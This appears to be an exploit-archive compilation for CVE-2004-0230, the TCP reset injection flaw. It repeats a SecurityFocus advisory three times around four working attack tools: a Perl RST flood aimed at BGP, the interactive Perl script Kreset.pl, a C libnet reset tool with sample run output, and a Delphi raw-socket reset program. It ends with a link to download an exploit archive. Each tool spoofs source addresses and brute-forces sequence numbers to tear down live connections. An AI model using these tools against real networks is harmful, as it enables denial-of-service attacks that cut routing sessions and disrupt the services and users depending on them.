CVE-2004-0230

source: https://www.securityfocus.com/bid/10183/info
 
A vulnerability in TCP implementations may permit unauthorized remote users to reset TCP sessions. This issue affects products released by multiple vendors. Exploiting this issue may permit remote attackers to more easily approximate TCP sequence numbers.
 
The problem is that affected implementations will accept TCP sequence numbers within a certain range of the expected sequence number for a packet in the session. This will permit a remote attacker to inject a SYN or RST packet into the session, causing it to be reset and effectively allowing denial-of-service attacks. An attacker would exploit this issue by sending a packet to a receiving implementation with an approximated sequence number and a forged source IP and TCP port.
 
Few factors may present viable target implementations, such as imlementations that:
 
- depend on long-lived TCP connections
- have known or easily guessed IP address endpoints
- have known or easily guessed TCP source ports.
 
Note that Border Gateway Protocol (BGP) is reported to be particularly vulnerable to this type of attack. As a result, this issue is likely to affect a number of routing platforms.
 
Note also that while a number of vendors have confirmed this issue in various products, investigations are ongoing and it is likely that many other vendors and products will turn out to be vulnerable as the issue is investigated further.
 
Other consequences may also result from this issue, such as injecting specific data in TCP sessions, but this has not been confirmed.
 
**Update: Microsoft platforms are also reported prone to this vulnerability. Vendor reports indicate that an attacker will require knowledge of the IP address and port numbers of the source and destination of an existent legitimate TCP connection in order to exploit this vulnerability on Microsoft platforms. Connections that involve persistent sessions, for example Border Gateway Protocol sessions, may be more exposed to this vulnerability than other TCP/IP sessions.

#!/usr/bin/perl
#
# Rich's BGP DOS!
# version .02
# Sends out RST flood to DOS BGP Connections
#
# Requires getopts.pl and Net:RawIP (http://www.ic.al.lg.ua/~ksv/)
#
#For this to work you must do a preceding scan to figure out what the source port and sequence number should be!
#Cisco routers have a magic source port after reboot and all subsequent source ports are incremented by 1 or 512 depending on IOS
#And also find out the hops to set the ttl w/ traceroute.  Per the RFC, the TTL must be 1 when it arrives at the router.
#
#

require 'getopts.pl';
use Net::RawIP;
Getopts('s:p:d:t:x');
$a = new Net::RawIP;
die "Usage $0 -s <spoofed source> -p <source port> -d <destination> -t <ttl>" unless ($opt_s && $opt_p && $opt_d && $opt_t);

$count=0;

while ($count < 4294967296) {

#Increment the count
                $count=$count + 16384;

#Create IP packet!
                $a->set({ ip => 
                        {saddr => $opt_s,
                        daddr => $opt_d,
                        ttl => $opt_t
                        },
#Another TCP port could be specified here to do DOSes on other TCP services.  BGP is 179
                        tcp=> {dest => 179,
                        source => $opt_p,
                        window =>  16384,
                        seq => $count,
                        rst => 1}
                        });
#Send it out!
                $a->send;
}

source: https://www.securityfocus.com/bid/10183/info
   
A vulnerability in TCP implementations may permit unauthorized remote users to reset TCP sessions. This issue affects products released by multiple vendors. Exploiting this issue may permit remote attackers to more easily approximate TCP sequence numbers.
   
The problem is that affected implementations will accept TCP sequence numbers within a certain range of the expected sequence number for a packet in the session. This will permit a remote attacker to inject a SYN or RST packet into the session, causing it to be reset and effectively allowing denial-of-service attacks. An attacker would exploit this issue by sending a packet to a receiving implementation with an approximated sequence number and a forged source IP and TCP port.
   
Few factors may present viable target implementations, such as imlementations that:
   
- depend on long-lived TCP connections
- have known or easily guessed IP address endpoints
- have known or easily guessed TCP source ports.
   
Note that Border Gateway Protocol (BGP) is reported to be particularly vulnerable to this type of attack. As a result, this issue is likely to affect a number of routing platforms.
   
Note also that while a number of vendors have confirmed this issue in various products, investigations are ongoing and it is likely that many other vendors and products will turn out to be vulnerable as the issue is investigated further.
   
Other consequences may also result from this issue, such as injecting specific data in TCP sessions, but this has not been confirmed.
   
**Update: Microsoft platforms are also reported prone to this vulnerability. Vendor reports indicate that an attacker will require knowledge of the IP address and port numbers of the source and destination of an existent legitimate TCP connection in order to exploit this vulnerability on Microsoft platforms. Connections that involve persistent sessions, for example Border Gateway Protocol sessions, may be more exposed to this vulnerability than other TCP/IP sessions.

use Net::RawIP;
## Kreator -> K-sPecial [http://xzziroz.freeshell.org]
## Date -> 4-23-2004
## Name -> Kreset.pl
## Version -> 1.0
##
## Use -> Used to reset a TCP connecting.
## (Using the slipping throught he window meathod described on 4-20-04)
## DESCRIBED HERE: http://www.uniras.gov.uk/vuls/2004/236929/index.htm
##
## Usage -> If you don't fuckin know how to use it, don't use it.
##
## Other -> I played around on nix for a few hours to get the idea down
## pat. I set up an IRCD and connected to it, looked at tcpdump to
## get irssi's local port. irssi's window size was larger so I figured
## i would pretend to be sending RST from server, irssi window 
## was around
## 30K while ircd window around 3K, big difference :D. So I enter values
## and since the connection is loop back, i used 0.0 seconds between
## packets.
## it only took a few minutes to disconnect with a 0.0 overlay and
## a 30K window starting at sequence number 0. Only problem over
## the internet, is finding the port of each side, sure you know the
## servers port but not the clients. I got to sequence number 1512500
## using a .10 second delay and a window size of 2500. Sequence 
## numbers are 
## 32 bit numbers, 32 1's comes out to be 4294967295. 
## Do the math, and you know precisely how long it takes to cover
## every sequence RANGE of a given port using a given window size.
## Window sizes should be based on application layer program.
##
## NOTE -> This script assumes you know at least one of the ports, 
## if the case is otherwise
## then the script can easily be modified to work around this. Also,
## this was written for
## UNIX variants.

print <<EOF;
-> Kreset.pl by K-sPecial [4-23-2004]
-> Used to reset a connection based on the slipping
-> through the window meathod, exploited publicly on 4-20-2004.
-> [http://xzziroz.freeshell.org]
-> Greets: K-sPecial (myself), saevio, attila, zeedo, uzimonkey
-> eightball, unmanarc, Buuyo^, and whomever else I forgot. 
EOF

print "\r\nDo you want a port range for the source IP, or the dest IP?";
print "\r\nIf you want it for the source, type 1, otherwise 2.";
print "\r\nIf you don't want it for either, type one or the other: ";
chomp (my $choice = <STDIN>);
unless ($choice == 1 || $choice == 2) { 
	print "\r\nEnter 1, or 2.\r\n";
	exit(1);
}
print "\r\nEnter source IP: ";
chomp (my $sip = <STDIN>);
if ($choice == 2) { 
	print "\r\nEnter source port: ";
	chomp ($sport = <STDIN>);
	if (!($sport)) { 
		print "\r\nYou must fill in a source port.\r\n";
	}
}
print "\r\nEnter dest IP: ";
chomp (my $dip = <STDIN>);
if ($choice == 1) { 
	print "\r\nEnter dest port: ";
	chomp ($dport = <STDIN>);
	if (!($dport)) { 
		print "\r\nYou must fill in a destination port.\r\n";
		exit(1);
	}
}
print "\r\nEnter begin port: ";
chomp (my $bport = <STDIN>);
print "\r\nEnter end port: ";
chomp (my $eport = <STDIN>);
if (!($sip) || !($dip) || !($bport) || !($eport)) {
	print "\r\nYou forgot to fill in one or more fields.\r\n";
	exit(1); ## Yea hahah we don't exit (0) anymore. LOL
}
print "\r\nDestinations guessed window size,";
print "\r\nIf you don't define this, we will try small (2500): ";
chomp (my $winsize = <STDIN>); ## Why did the window cross the road?
if (!($winsize)) {
	$winsize = 2500;
}
print "\r\nStarting sequence number,";
print "\r\nIf you don't define this, we will start at 0: ";
chomp (my $seqnum = <STDIN>); ## So he could prevent sequence numbers
if (!($seqnum)) {	      ## from getting through!
	$seqnum = 0;
}

print "\r\nNumber of seconds to wait between each packet sent,";
print "\r\nENTER DOTTED DECIMALS HERE PRECEEDED BY A 0 TO";
print "\r\nINDICATE NO MINUTES: 0.10 == 10 ms, 0.0 = 0 ms";
print "\r\nIf you don't define this, we will use 0.10: ";
chomp (my $ms = <STDIN>);
if (!($ms)) {
	$ms = "0.10";
}

print <<EOF;

Source IP is -> $sip
Source port is -> $sport
Destination IP is -> $dip
Guessed window size is -> $winsize
Starting sequence number is -> $seqnum
Loop wait is -> $ms
Begin port is -> $bport
End port is -> $eport
EOF
print "Destination port is -> $dport\r\n" if $dport;
print "Source port is -> $sport\r\n" if $sport;
print "\r\n";

my $i = $seqnum;
## LOOKS WHATS FOLLOWS! WES ARES SO LEETS WITHS OURS SELECTS TRICKSES!
## P.S K-sPecial's hopes yours usings a nix variants or this selects
## tricks just mights nots works.
for ($i; 1; $i += $winsize) { 
	if ($i > 4294967295) { 
		$bport++;
		if ($bport > $eport) { 
			print "Finished\r\n";
			exit(0);
		}
		else {
			print "Looping next port.\r\n";
			$i = $seqnum;
			sleep(2);
			next;
		}
	}
	if ($choice == 2) { 
		$dport = $bport;
	}
	else { 
		$sport = $bport;
	}
	
	select(undef, undef, undef, $ms);
	print "Sequence Number is -> $i port is -> $bport\r\n";

	 $a = new Net::RawIP;
         $a->set({ip => {saddr => "$sip",daddr => "$dip"},
                  tcp => {source => $sport,dest => $dport,rst => 1,
		  syn => 1, seq => $i}}) ;


$a->send;
}

/*
By: Paul A. Watson
Build a TCP packet - based on tcp1.c sample code from libnet-1.1.1

COMPILE:
gcc reset-tcp.c -o reset-tcp /usr/lib/libnet.a
or
gcc -o reset-tcp reset-tcp.c -lnet
** be sure to modify the MAC addresses (enet_src/enet_dst) in the code, or you WILL have problems!

EXECUTE:
reset-tcp [interface] [src ip] [src port] [dst ip] [dst port] [window size]

EXAMPLE (and timing packets sent with /bin/date):
[root@orc BGP]# date; ./reset-tcp eth1 172.16.0.1 1 172.16.0.2 2 65536; date
Tue Dec 16 21:18:28 CST 2003
Packets sent: 8192 Sequence guess: 536805376
Packets sent: 16384 Sequence guess: 1073676288
Packets sent: 24576 Sequence guess: 1610547200
Packets sent: 32768 Sequence guess: 2147418112
Packets sent: 40960 Sequence guess: 2684289024
Packets sent: 49152 Sequence guess: 3221159936
Packets sent: 57344 Sequence guess: 3758030848
packets sent: 65535
Tue Dec 16 21:18:46 CST 2003
[root@orc BGP]#
*/

/* modified by: J. Barber A.K.A Swoop
modified to use src mac from your interface and asks for the 
destination mac on the command line.

New Command-Line Example:
./reset-tcp eth1 172.16.0.1 1 172.16.0.2 2 00:01:02:03:04:05 65536

swoopafied: 3/30/04
*/

#include <libnet.h>
#include <stdio.h>

int main(int argc, char *argv[])
{
int c;
unsigned long int count=0;
unsigned long int count2=0;
unsigned long int seqguess=0;
unsigned long int seqstart=0;
unsigned long int seqincrement=0;
unsigned long int seqmax=4294967295;
u_char *cp;
libnet_t *l;
libnet_ptag_t t;
char *payload;
char * device = argv[1];
u_short payload_s;
u_long src_ip, dst_ip;
u_short src_prt, dst_prt;
char errbuf[LIBNET_ERRBUF_SIZE];

char sourceip[32] = "";
char destinationip[32] = "";

/* Change these to suit your local environment values */
/* Make enet_dst either the default gateway or destination host */
struct libnet_ether_addr *ptr_enet_src;
u_char enet_src[6];
u_char enet_dst[6];
u_char org_code[3] = {0x00, 0x00, 0x00};

/* Its only test code, so minimal checking is performed... */
if (argc<8) { 
printf("TCP Reset Tool v1.2\nBy Paul Watson - Modified by J. Barber\n");
printf("Usage: %s [interface] [src ip] [src port] [dst ip] [dst port] [gateway/destination MAC] 
[window size]\n",argv[0]); 
printf("Example: ./reset-tcp eth1 172.16.0.1 1 172.16.0.2 2 00:01:02:03:04:05 65536\n");
exit(1);
}

strcpy(sourceip,argv[2]);
src_prt = atoi(argv[3]);
strcpy(destinationip,argv[4]);
dst_prt = atoi(argv[5]);
seqincrement= atoi(argv[7]);
seqstart= 0;
seqmax = 4294967295; /* 2^32 */

payload = NULL;
payload_s = 0;
src_ip = libnet_name2addr4(l,sourceip,LIBNET_DONT_RESOLVE);
dst_ip = libnet_name2addr4(l,destinationip,LIBNET_DONT_RESOLVE);

memset(enet_dst, 0, sizeof(enet_dst));
sscanf(argv[6], "%02X:%02X:%02X:%02X:%02X:%02X", &enet_dst[0],
&enet_dst[1], &enet_dst[2], &enet_dst[3], &enet_dst[4],
&enet_dst[5]);

l = libnet_init(LIBNET_LINK,device,errbuf);
ptr_enet_src = libnet_get_hwaddr(l);
memcpy(&enet_src[0], ptr_enet_src,6);
printf("Src MAC: %02X:%02X:%02X:%02X:%02X:%02X\n", enet_src[0], enet_src[1],enet_src[2],enet_src[3],
enet_src[4],enet_src[5]);
printf("Dst MAC: %02X:%02X:%02X:%02X:%02X:%02X\n", enet_dst[0], enet_dst[1],enet_dst[2],enet_dst[3],
enet_dst[4],enet_dst[5]);

for (seqguess=seqstart;seqguess<seqmax-seqincrement;seqguess=seqguess+seqincrement) {
count++; count2++;
if (count2==8192) { count2=0; printf("Packets sent: %lu\tSequence guess: %lu\n",count,seqguess); }
l = libnet_init(LIBNET_LINK,device,errbuf);
t = libnet_build_tcp(src_prt,dst_prt,seqguess,0x00000001,TH_RST,0,0,0,LIBNET_TCP_H,NULL,0,l,0);
t = libnet_build_tcp(src_prt,dst_prt,seqguess,0x00000001,TH_RST,0,0,0,LIBNET_TCP_H,NULL,0,l,0);
t = libnet_build_ipv4(LIBNET_IPV4_H+LIBNET_TCP_H+payload_s,0,242,0,64,IPPROTO_TCP,0,src_ip,dst_ip,NULL,0,l,0);

t = libnet_build_ethernet(enet_dst,enet_src,ETHERTYPE_IP,NULL,0,l,0);
c = libnet_write(l);
}
printf("packets sent: %i\n",count);
return (EXIT_FAILURE); 
}

{
AFX TCP Reset by Aphex
http://www.iamaphex.cjb.net
unremote@knology.net

Compile with Delphi 5/6/7
}

program Project1;

{$APPTYPE CONSOLE}

uses
Windows;

type
TBufferArray = array[0..65535] of byte;

type
iph = record
ip_verlen: byte;
ip_tos: byte;
ip_len: word;
ip_id: word;
ip_offset: word;
ip_ttl: byte;
ip_protocol: byte;
ip_checksum: word;
ip_saddr: longword;
ip_daddr: longword;
end;

tcph = record
th_sport: word;
th_dport: word;
th_seq: longword;
th_ack: longword;
th_len: byte;
th_flags: byte;
th_win: word;
th_checksum: word;
th_upr: word;
end;

sb = packed record
sb1, sb2, sb3, sb4: char;
end;

sw = packed record
sw1, sw2: word;
end;

TInAddr = record
case integer of
0: (ssb: sb);
1: (ssw: sw);
2: (saddr: longint);
end;

TSockAddr = record
case integer of
0: (sin_family: word; sin_port: word; sin_addr: TInAddr; sin_zero: array[0..7] of char);
1: (sa_family: word; sa_data: array[0..13] of char)
end;

TWSAData = record
ver: Word;
hgh: Word;
dsc: array[0..256] of char;
sys: array[0..128] of char;
skt: Word;
udp: Word;
ven: PChar;
end;

function closesocket(sk: integer): integer; stdcall; external 'WS2_32.DLL' name 'closesocket';
function htons(hs: word): word; stdcall; external 'WS2_32.DLL' name 'htons';
function htonl(hs: longint): longint; stdcall; external 'WS2_32.DLL' name 'htonl';
function ntohl(hs: longint): longint; stdcall; external 'WS2_32.DLL' name 'htonl';
function inet_addr(cp: pchar): longint; stdcall; external 'WS2_32.DLL' name 'inet_addr';
function sendto(sk: integer; var bf; ln, fl: integer; var ad: TSockAddr; le: integer): 
integer; stdcall; external 'WS2_32.DLL' name 'sendto';
function setsockopt(sk: integer; lv, op: integer; ov: PChar; ol: integer): integer; 
stdcall; external 'WS2_32.DLL' name 'setsockopt';
function socket(af, st, pr: integer): integer; stdcall; external 'WS2_32.DLL' name 'socket';
function WSACleanup: integer; stdcall; external 'WS2_32.DLL' name 'WSACleanup'
function WSAGetLastError: integer; stdcall; external 'WS2_32.DLL' name 'WSAGetLastError';
function WSAStartup(vr: word; var ws: TWSAData): integer; stdcall; external 'WS2_32.DLL' name 'WSAStartup';

const
INVALID_SOCKET = integer(not(0));

var
hSocket: integer;
WindowPos: int64;
WindowCount: dword;
WindowSize: dword;
TargetHost: string;
TargetPort: word;
SourceHost: string;
SourcePort: word;
Odds: dword;
Delay: dword;

function CheckSum(var Buffer; Size: integer): word;
type
TWordArray = Array[0..1] of word;
var
lSumm: LongWord;
iLoop: integer;
begin
lSumm := 0;
iLoop := 0;
while Size > 1 do
begin
lSumm := lSumm + TWordArray(Buffer)[iLoop];
inc(iLoop);
Size := Size - SizeOf(word);
end;
if Size = 1 then lSumm := lSumm + Byte(TWordArray(Buffer)[iLoop]);
lSumm := (lSumm shr 16) + (lSumm and $FFFF);
lSumm := lSumm + (lSumm shr 16);
Result := word(not lSumm);
end;

procedure Header(FromIP: string; FromPort: word; ToIP: string; ToPort: word; Seq: longint; 
Window: longint; var Buffer: TBufferArray; var Socket: TSockAddr; var Size: word);
var
ipHdr: iph;
tcpHdr: tcph;
TcpHeaderLen: word;
ChecksumSize: word;
DataPointer: ^byte;
procedure IncPtr(Value: integer);
begin
DataPointer := pointer(integer(DataPointer) + Value);
end;
begin
Size := sizeof(ipHdr) + sizeof(tcpHdr);
ipHdr.ip_verlen := ((4 shl 4) or sizeof(ipHdr) div sizeof(longword));
ipHdr.ip_tos := 0;
ipHdr.ip_len := htons(Size);
ipHdr.ip_id := 0;
ipHdr.ip_offset := 0;
ipHdr.ip_ttl := 128;
ipHdr.ip_protocol := 6;
ipHdr.ip_checksum := 0;
ipHdr.ip_saddr := inet_addr(pchar(FromIP));
ipHdr.ip_daddr := inet_addr(pchar(ToIP));
ChecksumSize := 0;
tcpHdr.th_sport := htons(FromPort);
tcpHdr.th_dport := htons(ToPort);
tcpHdr.th_seq := htonl(Seq);
tcpHdr.th_ack := htonl(Seq + Window);
tcpHdr.th_len := 80;
tcpHdr.th_flags := 20;
tcpHdr.th_win := Window;
tcpHdr.th_checksum := 0;
tcpHdr.th_upr := 0;
DataPointer := @Buffer[0];
FillChar(Buffer, SizeOf(Buffer), 0);
Move(ipHdr.ip_saddr, DataPointer^, SizeOf(ipHdr.ip_saddr));
IncPtr(SizeOf(ipHdr.ip_saddr));
ChecksumSize := ChecksumSize + sizeof(ipHdr.ip_saddr);
Move(ipHdr.ip_daddr, DataPointer^, sizeof(ipHdr.ip_daddr));
IncPtr(SizeOf(ipHdr.ip_daddr));
ChecksumSize := ChecksumSize + sizeof(ipHdr.ip_daddr);
IncPtr(1);
Inc(ChecksumSize);
Move(ipHdr.ip_protocol, DataPointer^, sizeof(ipHdr.ip_protocol));
IncPtr(sizeof(ipHdr.ip_protocol));
ChecksumSize := ChecksumSize + sizeof(ipHdr.ip_protocol);
TcpHeaderLen := htons(sizeof(tcpHdr));
Move(TcpHeaderLen, DataPointer^, sizeof(TcpHeaderLen));
IncPtr(sizeof(TcpHeaderLen));
ChecksumSize := ChecksumSize + sizeof(TcpHeaderLen);
Move(tcpHdr, DataPointer^, sizeof(tcpHdr));
IncPtr(sizeof(tcpHdr));
ChecksumSize := ChecksumSize + sizeof(tcpHdr);
tcpHdr.th_checksum := CheckSum(Buffer, ChecksumSize);
FillChar(Buffer, sizeof(Buffer), 0);
DataPointer := @Buffer[0];
Move(ipHdr, DataPointer^, sizeof(ipHdr));
IncPtr(sizeof(ipHdr));
Move(tcpHdr, DataPointer^, sizeof(tcpHdr));
Socket.sin_family := 2;
Socket.sin_port := htons(0);
Socket.sin_addr.saddr := inet_addr(pchar(ToIP));
end;

procedure Send(TargetIP: string; TargetPort: integer; SourceIP: string; SourcePort: integer; 
Sequence: longint; Window: longint);
var
Buffer: TBufferArray;
Sck: TSockAddr;
Size: Word;
begin
Header(SourceIP, SourcePort, TargetIP, TargetPort, Sequence, Window, Buffer, Sck, Size);
SendTo(hSocket, Buffer, Size, 0, Sck, sizeof(Sck));
end;

procedure Init;
var
wsdata: TWSAdata;
op: integer;
begin
WSAStartup($0002, wsdata);
hSocket := Socket(2, 3, 0);
op := 1;
SetSockOpt(hSocket, 0, 2, @op, sizeof(op));
end;

function StrToInt(S: string): integer;
begin
Val(S, Result, Result);
end;

procedure DoExit;
begin
WriteLn('AFX TCP Reset');
WriteLn('http://www.iamaphex.cjb.net');
WriteLn('unremote@knology.net');
WriteLn('');
WriteLn('Usage: reset <src ip> <src port> <dest ip> <dest port> <window size> <send delay> [begin seq num]');
ExitProcess(0);
end;

begin
if Length(ParamStr(1)) < 1 then DoExit;
if Length(ParamStr(2)) < 1 then DoExit;
if Length(ParamStr(3)) < 1 then DoExit;
if Length(ParamStr(4)) < 1 then DoExit;
if Length(ParamStr(5)) < 1 then DoExit;
SourceHost := ParamStr(1);
SourcePort := StrToInt(ParamStr(2));
TargetHost := ParamStr(3);
TargetPort := StrToInt(ParamStr(4));
WindowSize := StrToInt(ParamStr(5));
Delay := StrToInt(ParamStr(6));
Randomize;
WindowPos := Random(4294967295);
if Length(ParamStr(7)) > 0 then WindowPos := StrToInt(ParamStr(7));
Odds := 4294967295 div WindowSize;
WindowCount := 0;
Init;
while WindowCount < Odds do
begin
if WindowPos > 4294967295 then WindowPos := 0;
Send(TargetHost, TargetPort, SourceHost, SourcePort, WindowPos, WindowSize);
Inc(WindowCount);
Inc(WindowPos, WindowSize);
Sleep(Delay);
end;
end.

// milw0rm.com [2004-04-22]

source: https://www.securityfocus.com/bid/10183/info
  
A vulnerability in TCP implementations may permit unauthorized remote users to reset TCP sessions. This issue affects products released by multiple vendors. Exploiting this issue may permit remote attackers to more easily approximate TCP sequence numbers.
  
The problem is that affected implementations will accept TCP sequence numbers within a certain range of the expected sequence number for a packet in the session. This will permit a remote attacker to inject a SYN or RST packet into the session, causing it to be reset and effectively allowing denial-of-service attacks. An attacker would exploit this issue by sending a packet to a receiving implementation with an approximated sequence number and a forged source IP and TCP port.
  
Few factors may present viable target implementations, such as imlementations that:
  
- depend on long-lived TCP connections
- have known or easily guessed IP address endpoints
- have known or easily guessed TCP source ports.
  
Note that Border Gateway Protocol (BGP) is reported to be particularly vulnerable to this type of attack. As a result, this issue is likely to affect a number of routing platforms.
  
Note also that while a number of vendors have confirmed this issue in various products, investigations are ongoing and it is likely that many other vendors and products will turn out to be vulnerable as the issue is investigated further.
  
Other consequences may also result from this issue, such as injecting specific data in TCP sessions, but this has not been confirmed.
  
**Update: Microsoft platforms are also reported prone to this vulnerability. Vendor reports indicate that an attacker will require knowledge of the IP address and port numbers of the source and destination of an existent legitimate TCP connection in order to exploit this vulnerability on Microsoft platforms. Connections that involve persistent sessions, for example Border Gateway Protocol sessions, may be more exposed to this vulnerability than other TCP/IP sessions.

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24032.tgz